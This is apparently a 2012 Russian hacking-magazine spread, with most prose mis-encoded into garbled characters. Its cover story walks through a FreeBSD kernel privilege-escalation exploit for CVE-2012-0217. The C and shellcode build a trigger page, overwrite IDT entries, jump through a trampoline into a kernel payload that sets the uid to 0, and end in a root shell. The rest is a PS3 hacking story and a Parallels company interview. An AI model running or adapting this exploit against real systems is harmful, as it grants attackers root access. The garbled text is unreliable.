F"@"*5 @/()0,"0 %,( 4"0, 7,7 B7:@#),43*/1,45 )<$130/:45. D, :,0/0 ("#" 1:" @*/:4/:1. E&("#<"0 :4*,%39) @,0<43 @"*"( %"7,%/%3?":730 ,(*":/0 %,

-*,%39" 0x0000800000000000.2. E&$&1,"0 @*/3$1/#5%&' :3:4"0%&' 1&$/1 (syscall) @*3 @/0/=3

:3:4"0%/-/ 1&$/1, 3%:4*)7933, *,:@/#/A"%%/' %"@/:*"(:41"%-%/ @"*"( ,(*":/0 %"7,%/%3?":7/' -*,%39&.

G/-(, /;*,;/4?37 fastsyscall 1/::4,%/134 *"-3:4*& @/#5$/-1,4"#<, /% 1&@/#%34 3%:4*)7932 sysret 3 @/@&4,"4:< 1"*%)45:< 7 «:#"()2="' 3%:4*)7933» 1 0x0000800000000000, «$,;&1» :0"%345 *"A30 ring 0 ĺ ring 3. .//41"4:41"%%/, #GP $,@):7,"4:< 1 *"A30" <(*,. G*/0" B4/-/, 3:7#2?"%3" 7,(*, @/0"=,"4:< 1 :4"7 ring 3. F,730 /;*,$/0, 0& 0/A"0 @"*"$,@3:,45 )7,$,4"#3 <(*, %, 4/4 ,(*":, 7/4/*&0 0/A%/ )@*,1#<45 : ring 3.

uint64_t pagesize = getpagesize();uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);area = mmap(area, pagesize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);if (area == MAP_FAILED) { perror("mmap (trigger)"); exit(1);}

// ǪȢȣȜȤȧșȠ ȜȥȣȢȟȡȳșȠȯȝ ȞȢȘ ȦȤȜȗȗșȤȔ,// ȫȦȢ ȡȔȩȢȘȜȦȥȳ ȡȔ ȗȤȔȡȜȪș ȞȢȡȪȔ ȥȦȤȔȡȜȪȯ// ȦȔȞȜȠ ȢȕȤȔțȢȠ, ȫȦȢȕȯ ȖȯȣȢȟȡȜȟȥȳ ȡȔȬ syscallchar triggercode[] = "\xb8\x18\x00\x00\x00" // mov rax, 24; #getuid "\x48\x89\xe3" // mov rbx, rsp; ȥȢȩȤȔȡȜȠ ȤșȗȜȥȦȤȯ r3 // Șȟȳ ȣȢȥȟșȘȧȲȭȜȩ ȘșȝȥȦȖȜȝ "\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe "\x0f\x05"; // syscall

uint8_t * trigger_addr = area + \ pagesize — TRIGGERCODESIZE;memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);

EH>6IDJDKJ >L6KME6IND6O6 G6PQ >*3 @"*"$,@3:3 $%,?"%3< 9"#"1/-/ *"-3:4*, RSP :)=":41)"4 (1, 3:C/(,:1. J:#3 $%,?"%3" *"-3:4*, RSP %" 0/A"4 ;&45 @"*"$,@3:,%/,

:*,;,4&1,"4 double fault ((1/'%,< /+3;7,), 1&$1,%%,< 8)%793"' Xdblfault(), 3 7,(* 3:7#2?"%3< @/0"=,"4:< 1 :@"93,#5%&' :4"7, 7/4/*&' $,7*"@#"% $, (,%%/-/ */(, 3:7#2?"%3<03.

2. E/ 14/*/0 :#)?," #GP 1/$%37,"4 1 Xprot() 3 7,(* 3:7#2?"%3< $,-%/:34:< 1 *"-3:4* RSP, 4,730 /;*,$/0 "-/ $%,?"%3" @"*"$,@3:&-1,"4:<.

!"#$% 09 /164/ 2012024

COVERSTORY

IDTVEC(prot) subq $TF_ERR,%rsp movl $T_PROTFLT,TF_TRAPNO(%rsp) movq $0,TF_ADDR(%rsp) movq %rdi,TF_RDI(%rsp)// ǮȫȜȭȔșȠ ȤșȗȜȥȦȤ Șȟȳ GP leaq doreti_iret(%rip),%rdi cmpq %rdi,TF_RIP(%rsp) je 1f// ǿȘȤȢ ȥ ȲțșȤȠȢȘ GS base r0->r3 testb $SEL_RPL_MASK,TF_CS(%rsp)// ǯȤȢȖșȤȳșȠ, ȢȦȞȧȘȔ Ƞȯ ȣȤȜȬȟȜ jz 2f// ǯȤȢȘȢȟȚșȡȜș ȤȔȕȢȦȯ Ȗ ȤșȚȜȠș ȳȘȤȔ r0 swapgs movq PCPU(CURPCB),%rdi

!"# #"# $% &'()*( (+ ,-'" (&'( .%&/*010(( (023'4#5(( sysret), &'( &'/.1'#1 testb $SEL_RPL_MASK,TF_CS(%rsp) 423"0".-*(."132, 6*"7 'Z', &/83/$4 &/ #/$"0-1 jz $% &'%7"1$ 0" 4#"+"0049 $13#4 2f, /:;/-, 31$ 2"$%$ (023'4#5(9 2./&" GS — swapgs. </ =3/, 12*( 2510"'(> '"+./'"=(."132, &/ &1'./$4 &43(? !"# #"# 51&? 2/-:%3(> GS &'/(2;/-(3 . GS ring 3, &'( -/234&1 # GS:data &'/(+/>-13 .%+/. /)(:#( 23'"0(5% XPage(). !"#($ /:'"+/$, 51&/=#" 2/:%3(> fault, double fault, tripple fault ( 3"# -"*11 &'(.1-13 # #'";4 2(231-$%. @2*( .#*9=(3? 2$1#"*#4, 3/ $/A0/ &'(-4$"3? .%;/- (+ 83/> 2(34"5((: .1'043?2, . 0"="*/ ( ./223"0/.(3? +0"=10(1 '17(23'/., #/3/'%1 $% &1'1+"&(2"*(. B"*11 :%*/ :% 01&*/;/, 12*( :% $% $/7*( +"$10(3? "-'12 /:'":/3=(#" /)(:#( 23'"0(5%, =3/ &/+./*(3 .%&/*0(3? &'/(+./*?0%> #/-, 12*( ./+0(#013 (2#*9=10(1 #PF. C 83/$ 0"$ &/$/A13 $13/- ./223"0/.*10(, 23'4#34'.

D$/3'($ )*9+% -12#'(&3/'/.:

+0: Target Offset[15:0] | Target Selector+4: Some stuff | Target Offset[31:16]+8: Target Offset[63:32]+12: Some more stuff

E 6">* include/frame.h:

struct trapframe { register_t tf_rdi; register_t tf_rsi; register_t tf_rdx; register_t tf_rcx; register_t tf_r8; register_t tf_r9; register_t tf_rax; register_t tf_rbx; register_t tf_rbp; register_t tf_r10;... register_t tf_rfl ags; register_t tf_rsp; register_t tf_ss;};

F/7-" 2'":/3"13 (2#*9=10(1, $(#'/&'/5122/' +"push(3 . 231# +0"=10(, ss, rsp, rflags, cs, rip, err. G3/ (**923'('493 (023'4#5(( movl $T_PROTFLT,TF_TRAPNO(%rsp), movq $0,TF_ADDR(%rsp). H0( &()43 . 231# '"22$"3'(."1$%1 +0"=10(,. H20/.0", &'/:*1$" . 3/$, =3/, #/7-" &'/(2;/-(3 (2#*9=10(1, RSP (2&/*?+413 ".3/-$"3(=12#/1 .%'".0(."0(1 . 16 :">3. !"#($ /:'"+/$, 24I123.413 ./+$/A0/23? &1'1+"&(2"3? 3/*?#/ &1'.%1 32-LSB 2$1I10(,. @I1 /-0" (023'4#5(, — movl $T_PROTFLT,TF_TRAPNO(%rsp) &()13 /3 0 -/ tf_addr. H0" 3"#A1 (2&/*?+413 .%'".0(."0(1 . 16 :">3. <"-1A-" 0" &/2*1-099 (023'4#5(9 movl $T_PROTFLT,TF_TRAPNO(%rsp). E -"! H0" &()13 +0"=10(1 T_PROTFLT (0x9) . tf_trapno, (2&/*?+4, .%'".0(."0(1 . 16 + 8 :">3! !/, =3/ 0"$ 04A0/. J'( &/$/I( 83/> (023'4#5(( $% $/A1$ 423"0/.(3? . 51*1.%1 2$1I10(, [63:32] +0"=10(1 0x9. @2*( 423"0/.(3? +0"=10(, . RSP IDT[14]+10*8 (.%'".0(."0(1 tf_trapno 2 51*1./> #PF 2$1I1-0(1$ [63:32]), $% $/A1$ 423"0/.(3? "-'12 #PF /:'":/3=(#" 0" 0x9WWXXYYZZ. F'/$1 3/7/, +0"=10(1 WWXXYYZZ 0"$ 4A1 +"'"011 (+.1230/, 3"# #"# $% $/A1$ &/*4=(3? "-'12 #PF &'( &/$/I( 640#5(( get_symaddr(). B*, 3/7/ =3/:% $% 2$/7*( .%&/*0(3? &'/(+./*?0%> #/- 0" 2(231$1, 04A0/ :4-13 423"0/.(3? 3'"$&*(0-#/- 0" 0x9WWXXYYZZ, #/3/'%> 2/-1'A(3 #/- 423"0/.#( ( &1'1;/- 0" 0") ,-1'0%> &8>*/"-.

*(uint64_t*)(trigger_addr + 10) = \ (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);

char trampolinecode[] = "\x0f\x01\xf8" // swapgs; ȣșȤșȞȟȲȫȔșȠ Ȗ r0 gs:base "\x48\x89\xdc" // mov rsp, rbx; ȖȢȥȥȦȔȡȔȖȟȜȖȔșȠ țȡȔȫșȡȜș rsp,// șȥȟȜ ȡșȦ ȕȢȟȰȬș ȖȢțȠȢȚȡȢȥȦȜ ȜȥȣȢȟȰțȢȖȔȦȰ r3-ȥȦșȞ "\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde"// mov rax, 0xdeadc0decafebabe "\xff\xe0";// jmp rax

uint8_t * trampoline = (uint8_t*)(0x900000000 \ | (Xpage_ptr & 0xFFFFFFFF));size_t trampoline_allocsize = pagesize;// Ǣ ȞȢȡȪș ȢȕȤȔȭȔșȠȥȳ Ȟ PAGESIZE Șȟȳ ȤȔȥȣȤșȘșȟșȡȜȳ// ǭș ȩȖȔȦȔșȦ ȠșȥȦȔ Șȟȳ ȦȤȔȠȣȟȜȡ-ȞȢȘȔ?if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE) trampoline_allocsize += pagesize;if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED) { perror("mmap (trampoline)"); exit(1);}memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);*(uint64_t*)(trampoline + 8) = \ (uint64_t)kernelmodepayload;

JHBB@KLFM D!MNEOP<HQH RBKM S% '"+/:'"*(2? 2 (2&/*010(1$ &'/(+./*?0/7/ #/-", 0/ +":%*( 7*".0/1. D'"+4 A1 &/2*1 3/7/, #"# $% &/*4=($ +".130%> shell, ,-'/ .%*13(3 . kernel panic. G3/ &'/(+/>-13 &/3/$4, =3/ $% 01 ./223"0/-.(*( 23'4#34'% ,-'" &/2*1 &1'1+"&(2(. T3/:% 83/7/ 01 &'/(+/)*/, 01/:;/-($/ ./223"0/.(3? 23'4#34'% . 3":*(51 IDT:• (2#*9=10(1 6'1>$" #GP &1'1+"&(2%."13 )123? 64-:(30%; '17(-

23'/., 3/ 123? &'/(2;/-(3 &1'1+"&(2? IDT[18], IDT[17] ( IDT[16];• tf_addr &1'1+"&(2%."13 64-LSB . IDT[15];

!"#"$ %&'( )*+,('-./0 , !#-1"..-#&2 INTEL, & ('"%%- — 3#(/(4".3(5 0-DAY %&6(2 $%"5

!"#"$%&' ()*+#,-

!"#$% 09 /164/ 2012 025

• tf_trapno ."*"$,./0&1,"2 03"4"%/" [63:32] 1 IDT[14];• *"-/02* RDI ."*"$,./0&1,"2 64-LSB 1 IDT[7];• /05#67"%/" 8*"'3, #PF ."*"$,./0&1,"2 IDT[6], IDT[5] / IDT[4].

95,$,%: — 0("#,%::

struct gate_descriptor *idt = sidt();setidt(idt, IDT_OF, Xofl _ptr, \ SDT_SYSIGT, SEL_KPL, 0); // 4setidt(idt, IDT_BR, Xbnd_ptr, \ SDT_SYSIGT, SEL_KPL, 0); // 5setidt(idt, IDT_UD, Xill_ptr, \ SDT_SYSIGT, SEL_KPL, 0); // 6setidt(idt, IDT_NM, Xdna_ptr, \ SDT_SYSIGT, SEL_KPL, 0); // 7setidt(idt, IDT_PF, Xpage_ptr, \ SDT_SYSIGT, SEL_KPL, 0); // 14setidt(idt, IDT_MF, Xfpu_ptr, \ SDT_SYSIGT, SEL_KPL, 0); // 15setidt(idt, IDT_AC, Xalign_ptr, \ SDT_SYSIGT, SEL_KPL, 0); // 16setidt(idt, IDT_MC, Xmchk_ptr, \ SDT_SYSIGT, SEL_KPL, 0); // 17setidt(idt, IDT_XF, Xxmm_ptr, \ SDT_SYSIGT, SEL_KPL, 0); // 18

;<=>?@AB@ ;CB=BD@EBF 9,3:" .*:02:", 72: G)("2 1 %,+"3 H50.#:'2". @(/%021"%%:", 72: .:2*"G)"20I, — H2: )$%,2J ,(*"0, /("%2/8/5,2:*:1 2"5)4"' )7"2%:' $,./0/ / /$3"%/2J /K $%,7"%/" %, 0 ($%,7"%/" /("%2/-8/5,2:*, (#I root). L%,I, 72: ,(*"0 2"5)4"' 02*)52)*& .:2:5, 1 FreeBSD 3:M"2 G&2J .*:7/2,% 0 GS:0, 3:M%: %,./0,2J 0#"()6-4/' 5:(:

struct thread *td;struct ucred *cred;

// ǯȢȟȧȫȔșȠ ȔȘȤșȥ ȦșȞȧȭșȝ ȥȦȤȧȞȦȧȤȯ ȣȢȦȢȞȔasm ("mov %%gs:0, %0" : "=r"(td));

cred = td->td_proc->p_ucred;cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;cred->cr_groups[0] = 0;

A) / %,5:%"N, %,./+"3 :G"*25) / 0,3 ring 3 +"##-5:(, 5:2:*&' G)("2 /0.:#J$:1,2J /%02*)5N/6 sysret (#I 1&.:#%"%/I 5:(, 1 ring 0:

asm ("swapgs; sysretq;" :: "c"(shellcode));// ǢȢȥȥȦȔȡȔȖȟȜȖȔșȠ ȔȘȤșȥ Ȭșȟȟ-ȞȢȘȔ Ȝț ȤșȗȜȥȦȤȔ rcxvoid shellcode(){ printf("[*] w00t! w00t!!, u g0t r00t! :D\n"); exit(0);}

O3… 92:., , -(" M" 0,3 +"##-5:(? P "-: %"2 :). =0" ("#: 1 2:3, 72: 02*)52)*, )7"2%&K (,%%&K .:#J$:1,2"#I *,0.*"("#I"20I 3"M() .*:N"00,3/ H2:-: .:#J$:1,2"#I. Q,5 5,5 3& /$3"%/#/ /("%2/8/5,2:*&, .:*:M("%%&' shell G)("2 ,12:3,2/7"05/ %,-0#"(:1,2J .*/1/#"-// 0 /("%2/8/5,2:*:3 0, 2: "02J .*/1/#"-// 0)."*.:#J$:1,2"#I root (.*/3"*& H50.#:'2:1 / PoC 03:2*/ 1 src/CVE-2012-0217).

;<R=@R@S BQ<EB =:$3:M%:, 0"'7,0 .:/05 :+/G:5 1 M"#"$" — H2: H5$:2/5,, %:, .:1"*J, .*/("2 1*"3I, 5:-(, ,..,*,2%&" )I$1/3:02/ 1:'()2 1 %,+) M/$%J / G)()2 .:.)#I*/$/*:1,2J0I ("%J :2: (%I, 5,5 / /K 0:821"*%&" G*,2JI. T./("3// «M"#"$%:'» 3,#1,*/ 2,5M" %" $, -:*,3/. = 0#"()64"' 02,2J" .:( 3:/3 05,#J."#"3 :5,-M)20I 5:%N".2),#J%&" *"#/$& %, H2) 2"3). 9#"(/ $, %:1&3/ 1&.)05,3/. z

!"# #$% &"'"(#) '*+$,- .$/0123&*2 456 ' %"&72 2010 8"+$. 9$% #* 032 .&$2:) -. ;/2+*+0<-= '*;0(%"' ][, ;2/'*> 0?.'->"(#) ' -8/"'"@ ;/-(#$'%2 Play Station (%$&+$,)&"@ %"/;"/$7-- Sony &$:2, &2 %#" -&"@, %$% GeoHot. A$ ($>"> +2,2 1",):$? B$(#) -((,2+"'$&-@ 1*,$ ("'2/:2&$ +" GeoHot’a 28" %">$&+"@ failoverfl0w, "#%0+$ "& 0:2, .$ 8"+ +" ('"28" "#%/*#-?.

!+"'",) &$B-#$':-() >$#2/-$,"' &$ ($@#2 failover-fl0w - ' 1,"82 C3"/+3$ D"#7$, ? &2 0+"',2#'"/-,(?, -1" ;/2+(#$',2&&$? 0?.'->"(#) &"(-,$ ;(2'+"$;;$/$#&*@ =$/$%#2/.

E"+&*@ F%(;,"@# ;"?'-,(? ' &$B$,2 >$/#$ 2011 8"+$, %"8+$ =$%2/ ;"+ &-%"> DarkHacker (""1<-, " #">, B#" &$:2, $;;$/$#&0G 0?.'->"(#) ' >-%/";/"72(("/2 ;/"-.'"+(#'$ IBM — Cell Broadband CPU.

H1/$<2&-2 =$%2/$ % &$/"+0: «I?.'->"(#) ' CPU ;">"32# &$> ;"+"@#- &$ :$8 1,-32 % METLDR. J /2:-, ";01,-%"'$#) F#0 -&K"/>$7-G, ;"#">0 B#" ,G+- ->2G# ;/$'" +2,$#), B#" -> ="B2#(?, - -&K"/>$7-? +",3&$ 1*#) ('"1"+&$. L&$G, B#" .$ F#" >2&? >"80# .$(0+-#). M0(#) %$#-#(? 8$+%$? Sony % B2/#0! !(2 F#" +,? #$%-= 32, %$% ?, =$%2/"'. 6 ? 10+0 1"/"#)(? .$ ;/$'$ ,G+2@ +" %"&7$ ('"2@ 3-.&-».

PS3: !"#$"%&$$'( '!!')'*$'( +(,-./"0*1 - /.2)"!)"%&00")& CELL

WWW

• 2343567 89:;<63883=34>?@ ABC;DE694:F >3 exploit-db.com: bit.ly/ODrkeZ;• G3C6;3B E34H394I 86 8=6J:996=3E: bit.ly/M7DsYs;• 6KDJD35I>3B L==343 64 Intel: bit.ly/tkM1hq;• <:435I>6: 68D93>D: ABC;DE694D CVE2012-0217 64 =3C=3G64HDM6; XEN: bit.ly/KEThRb;• 645DH>3B 8=:C:>43JDB @3=<;3=>6F ABC;DE694D ; PS3: bit.ly/hIknSr;• =:9A=9?, 869;BN:>>?: G:C6839>694D 8=D943;6M Sony: ps3sdk.com, ps-groove.com;• attacking SMM Memory via Intel CPU Cache Poisoning: bit.ly/rothK.

026

!"#"$%&'( )*"+', -(./,

!"#$% 09 /164/ 2012

COVERSTORY

!"#"$% 0 +%#*1+/( +%+'( & 234-, 5%"6 7'8%&%6 9':"$;%6 7<( -,#*/*1* :/8/9/ &<#%9/= >,";?/6. &'())*+, -,).+. !(/+01.)2 3 4+0-+)5+3*+- 67+.31*+, 1 8 *1/ ,).9 )3+: 8)5+71.,'9 ;().1< (3.+7+:, 4+)', CERN), )3+, 5+'9<+. !()5+'95+ 2 4+*1-(=, +* 0+ )1/ 4+7 7(>+.(,..

@ ,/= 7<(% :',*'#*/A"#9%" +% *"5 &;"5",'5 %7"-#+"A",/" &<A/#(/*"(.,%6 *"=,/9%6 / (/*";'*1;%6. &?@ >A' 47+031*8.+: +7B(*1C(<1,:, +* +>/+01' 3), C(47,.A *( 4+).(358 .,/*151 3 DDDE. &+*,;*+, F.+ 3), *( 87+3*, )'8/+3, *+, B+3+72., +*1 7(>+.('1 )+ )4,<)'8G>(-1 ?HE, 5+.+7A, /+01'1 3 IE? (4,J5+-, ;,7,C +)+>8= 5('1.58 3 @,7'1*)5+: ).,*,), 4+584('1 5+-49=.,7 1 *,)'1 ,B+ +>7(.*+. 6+.+- F.( .,/*15( 0+).(3'2'()9 3 D+3,.)51: D+=C.

0 1A/(#B /, +;B5% #9'C"5, 8',/5'(#B &#B9%6 +%(1-";1,$%6, 9'9 / (D7%6 $;1?%6 #*1$",*. E(>+.( >A'( +;,*9 47+).(2: ,).9 8)5+71.,'9 ;().1<, ,).9 5(51,-.+ 0(.;151, 1 *8G*+, ;.+>A 0(**A, ) F.1/ 0(.;15+3 4+).84('1 *( 5+-49=.,7A, /7(*1'1)9 1 +>7(>(.A3('1)9. H'2 *('(G1-3(*12 47+<,))( 5(5 7(C .7,>+3('1)9 )4,<1('1).A 4+ 3A-;1)'1.,'9*+: .,/*15,. 6+)5+'958 2 .+B0( .+'95+ 8;1')2, -,*2 C(B78G('1 *, )(-A-1 3(G*A-1 C(0(;(-1.

026

K).+712 )+C0(*12 B1B(*.+3 IT — Apple, Microsoft, Facebook — >A'( 7+-(*.1C1-7+3(*( ?+''1380+- 1 G87*('1).(-1 1 )3,0,*( 5 472-+: '1*11 -,G08 .+;5(--1 " 1 B. %0*(5+ 7())5(C + 3+C*15*+3,-*11 5+-4(*11 Parallels 1C 8). 472-+B+ 8;().*15( )+>A.1: 4+5(CA3(,., ;.+ 3 7,('9*+).1 0'2 .(5+: '1*11 4+47+).8 *, /3(.(,. >853 3 ('L(31.,.

DM"!KD$"N 6E%M"D%NC&&'(&)"*$+, - .+")" %"/%"0&*#- #&12"(-- PARALLELS

E%#(" /,#*/*1*' ,'#*1+/(% /,*";"#,%" &;"5B. @A'+ .780-*+ *(:.1 7(>+.8, *,4+*2.*+, 5(5 3++>O, F.+ 0,'(.9. N,09 5+B0( 2 4+'8;1' 014'+-, *( 03+7, >A' 1993 B+0 — 4,73A: 1'1 3.+7+: B+0, 5+B0( 1*).1.8.)5+, 7()47,0,',*1, +.-,*1'1. P('+ 5(51, 5+-4(*11 1)4A.A3('1 *8G08 3 )4,<1('1).(/. N *(8;*A/-.+ +7B(*1C(<12/ .+;*+ *15.+ *, >A' *8G,*, ( +>)'8G13(=O1: 5+-49=.,7A 4,7)+*(' .+B0( 4+;.1 *, .7,>+3(')2, 3,09 5+--49=.,7A ).+1'1 +;,*9 0+7+B+ 1 4+.+-8 >A'1 7,05+).9=.

4%?$' 91+/*. =%;%F/6 9%5+.D*"; 5%C,% 7<(% 8' 1500–3000 $%((';%&, ' 8';+('*'... D5(G,-, -+2 4,73(2 C(74'(.( 4+)', 1*).1.8.( )+).(3'2'( 30 0+''(7+3 3 -,)2<. M+ ,).9 5+-49=.,7 2 -+B 4+C3+'1.9 ),>, 4+)', 0,)2.1 ',. 84+7*+: 7(>+.A.

)%&";F",,% #(1A'6,% B +;/7/(#B 9 /,#*/*1*1 +;/ 2-G4 (2%#9%&#9/6 /,#*/*1* >("9*;%,,%6 *"=,/9/) & H"(",%-?;'$", ?$" +;%&"( %9%(% ?%$'. Q.+ >A' 4+',C*A: +4A.. M(- 2 +.57A' 0'2 ),>2 *,)5+'95+ *+3A/ .,-, + 5+.+7A/ 7(*9J, *, )'AJ(': 4+C*(5+-1')2 ) )+L.+- 0'2 47+,5.17+3(*12 -157+)/,- CAD, 8310,' G139,- HP’J*A: UNIX, 8C*(', ;.+ 3++>O, )8O,).38,. UNIX, ;.+ 8 *,B+ 7(C31.(2 command line, 4+0 *,B+ 41J8. 07(:3,7A 0'2 8).7+:).3, 8 *,B+ .(5(2-.+ B7(L1;,)5(2 )1).,-( 1 .(5 0(',,.

!"#$% 09 /164/ 2012 027

&"#'( !"#$%&' (#)"#*)"&+ ,&-&"#-

./0$&%/)"&+ &$).&.1. (,2"1'3./.

425&#./0$&"& & "&6/4$/.&"&).

!"#'# 20 '/. #78.2 * 42-426#."/ 9!.

:*.#4 74&;/4$# 50 72./$.#*.

!5&$ &- )##)$#*2./'/+ "#;72$&&

Parallels.

9#;#<2' * )#-52$&& "#;72$&+

Acronis & Acumatica.

94&$&;2' 1%2).&/ * 74#/".20 BeOS,

ASPLinux, Westcom, Cassandra,

Solomon IV, Pervasive.

!6'252./'3 6#'// 30 $2<425 -2 42--

426#."1 74#<42;;$80 74#51".#*

& ./0$#'#<&+.

!"#$% 09 /164/ 2012028

! "#$%&'$ ()"$#*#+ #",-, (# "#-#. /01#-0 202--#... 302#(&'$045. !"#$%$&$ '() *+#&,-.-#$/0""(1, - 2"-3%$, $-1+4"%0 5.+60##( $+70 +#$-)%#8 #+ /.010" 9+/0$#:+*+ 9+;2-. < 3-#$-"+#$% — &30$ .-'+30*+ /.010"%. =0)82> '()+ +5-2,(/-$8 % "0)82> '()+ &?+,%$8 .-"840. @+*,- 5.+0:$ 2-:+"3%)#>, A$+ 5.0/.-$%)+#8 / 5($:&. B0$+,%3"+ 2-#$-/%$8 #0'> %2&3-$8 3$+-)%'+, "0 %10> :+":.0$"+C 2-,-3%, 1+*&$ $+)8:+ D-"$-#$%30#:% #D+:&#%.+/-""(0 );,%. E.+ $-:%? .-2/0 3$+ :%"+ #"%1-;$.

6#780 .#-'90:'; "/#"080)-, "#1#&(,) 30(;-'; (9 '7/%<2% "#'7/0-5, )=) &-#--# 48)$0-5) -#>) #&)(5 1,4-/# "/')80?-4;. =0/+21+7"+ #%,0$8 % "%30*+ "0 ,0)-$8, 5+3$% D%2%30#:% +F&F-048, :-: $&50048. E+A$+1& 30.02 *+,, :+*,- #$-)+ #+/#01 "0/("+#%1+, > +$$&,- #'07-).

@ "#"0$ 9 2#."0('? Sunrise, 9 2#-#/#+ %>) /01#-0$ A)/7)+ B)$#%4#9 (+#"+/-$0)8 Parallels, Acronis, Acumatica, D+",- Runa Capital % 5+270 ')%2:%C ,.&* — 5.%1. .0,-:-6%%). G*+ > #+/0.40""+ "0 2"-), $&,- 10"> 5+2/-) +,"+:&.#"%:. H 5.%40) :-: #%#$01"(C -,1%"%#$.-$+., A"%:0CF%:, 5.+*.-11%#$... < $+ /.01> /#0 '()+ 50.0104-"+.

IJB, KLG <M9NML!I 9MO=PG C)/)3 7#8 ; "#"0$ 9 (#9#) "/)8"/';-') B)$#%4#90. I+*,- 01& $.0'+/-)#> $0?"%30#:%C 30)+/0: / 9%"*-5&.0 — 90.*0C 2-"%1-)-#> '%2"0#+1, #/>2-""(1 # 5+#$-/:+C %2-2- .&'07- :+158;$0."(? 2-53-#$0C, 1+"%$+.+/, 5.%"$0.+/ % 5.+30*+.

D '(-)/)40* E-#+ 2#."0('' ; "#)*0$ 9 A'(-70"%/, 78) ' "/#>'$ ";-5 $)-. !10""+ $-1 1( # 90.*001 5($-)%#8 2-"%1-$8#> #+D$/0."(1 '%2"0#+1 % /50./(0 &,-)+#8 3$+-$+ ,0C#$/%-$0)8"+ 5+#$.+%$8.

F0< ")/9,+ 1'3()4, "# 4%-', 1,$ 9 #1$04-' IT-0%-4#/4'(70. B( 5.+,-/-)% -10.%:-"#:%1 :+15-"%>1 R&D-&#)&*% .+##%C#:%? %"70"0.+/. E.-/,-, '%2"0# & "-# '() "01"+*+ #$.-""(C — "-4% .+##%C#:%0 %"70"0.( $+70 "-?+,%)%#8 / 9%"*-5&.0. E.%3%"- '()- 5.+#$-: / $+ /.01> 1"+*%0 -10.%:-"#:%0 :+15-"%% 5+5.+#$& '+>)%#8 .-'+$-$8 # Q+##%0C. B"+*%0 ,+ #%? 5+. #1+$.>$ # +5-#:+C, "+ $+*,- '+>)%#8 +$:.+/0""+.

G.)/'20(:)9 4'$5(# (0"/;70$#, &-# 890 7#4%80/4-90 () "/'3(090$' 302#(, # 30='-) '(-)$$)2-%0$5(#+ 4#14-9)((#4-' 8/%7 8/%70. R$- 5.+')01- "0 /5+)"0 .040"- % #0C3-#, "+ #0*+,"> &70 1"+*+0 #,0)-"+, 3$+'( #')%2%$8 2-:+"+,-$0)8#$/- ,/&? #$.-" / A$+1 /+5.+#0. E.% .-'+$0 # .+##%C#:%1% %"70"0.-1% -10.%-:-"6( '+>)%#8 +$,-/-$8 %1 :+,: ,&1-)%, 3$+, :-: $+)8:+ +"% A$+ #,0)-;$, / Q+##%% $+$3-# 5+>/%$#> :)+" -10.%:-"#:+*+ 5.+,&:$-. <#0 :+5%.-C$( % 5.-/- ,)> .+##%C#:+*+ #&,- / $+ /.01> >/)>)%#8 5+ '+)84+1& #30$& D%)8:%"+C *.-1+$+C. J # #%"*-5&.#:+C :+15-"%0C /#0 +?+$"+ .-'+$-)%, /0.%)% "-1, 3$+ .+##%C#:%0 %"70"0.( ,+#$-$+3"+ $+):+/(0, 1"+*+ 2"-;$ % /++'F0 +"% ,-70 "0 %"70"0.(, - #:+.00 &30"(0 (3$+ '()+ 5.-/,+C).

D"$#-5 8# 1999 7#80 94) 9,7$;8)$# *#/#-<#. =+ & "-# /#0*,- '()- %,0>, 3$+ )&340 '()+

'( ,0)-$8 #/+% 5.+,&:$(. <0,8 -&$#+.#%"* 301-$+ 5+?+7 "- body shopping, 2- %#:);30-"%01 $+*+, 3$+ "05+#.0,#$/0""+ );,0C "0 +$5.-/)>;$ / +D%# 2-:-23%:-.

H024'.%., 30 2#-#/,+ -#780 9 A'(70"%/) .#>(# 1,$# "/#80-5 %4$%7' '(>)()/0, 1,$ 78)--# 12–15 -,4;& 8#$$0/#9 9 .)4;: 30 &)$#-9)20. R$+ "0 $-: 1-)+, &3%$(/->, 3$+ #.0,"%0 2-.5)-$( / Q+##%% $+*,- '()% "%70 $(#>3% ,+))-.+/, "+ A$+ % "0 $-: 1"+*+.

A'(70"%/42#) "/09'-)$54-9# () 8090$# "/'-9#3'-5 8)<)9,* '(>)()/#9 — 9'3, 9,8090$', -#$52# )4$' ., 9)3$' 4"):'0$'4-#9, 2#-#/,) 1,$' 8#/#>) -02'* >) .)4-(,*. E+#)0,"%? $+*,- +#+'0""+ "0 '()+, % +"% #$+%)% ,040/+, 5+$+1& 3$+ "%30*+ $+):+1 "0 &10)%. I-: 3$+, 5.%/+2> 30)+/0:- %2 Q+##%%, 1( ,+)7"( '()% 5)-$%$8 01& 2"-3%$0)8"+ '+)840, 301 10#$"+1&.

602 %4-/#)( (#/.0$5(,+ 0%-4#/4'(7 1'3()4, 420>)., 9 @(8''? S "%? 0#$8 5.+-0:$ — Microsoft 2-:-2-) &#)&*% $0#$%"*- %)% maintenance. M"% — ?+5! — % "-"%1-;$ 5+, "0*+ $.% ,0.0/"%. G#)% Microsoft A$+$ 5.+0:$ 5.0:.-F-0$ — &/+)8">;$. =0$ "%:-:+C 5.+-')01(, 0#)% #)&3%$#> "+/(C 5.+0:$ — %? #"+-/- "-C1&$. < "-401 #)&3-0 $-:+0 "0 .-'+$-)+.

